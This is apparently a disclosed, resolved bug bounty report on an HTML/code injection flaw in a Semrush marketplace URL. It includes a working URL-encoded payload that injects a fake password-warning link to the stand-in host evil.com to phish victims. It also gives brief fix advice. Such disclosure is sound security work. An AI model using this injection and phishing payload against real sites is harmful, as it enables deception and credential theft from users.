Code injection in https://www.semrush.com
Medium
S
Semrush
Submitted None
Team Summary
Official summary from Semrush
During the internal investigation, we have found ways to perform XSS attack using this vulnerability.
Actions:
Reported by
dangkhai0x21
Vulnerability Details
Technical details and impact analysis
##INTRODUCES:
-With a direct error on the homepage, it is easy to trick the victim into accessing a fake page from the attacker
##STEP:
Step: Send url with payload to victim:
https://www.semrush.com/marketplace/%22%0D%0A/%3E%3Ch1%3E%3Ca%20href%3Dhttps://evil.com%3EYour%20password%20is%20currently%20unsafe,%20please%20click%20the%20link%20to%20update%20the%20information%3C/a%3E%3C/h1%3E/
==> Victim enter link and open redirect to evil.com , Attacker can phishing to Retrieve user information.
##FIX:
-Whitelist
-Filter "<"
## Impact
- Fake notification.
- Open redirect
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Code Injection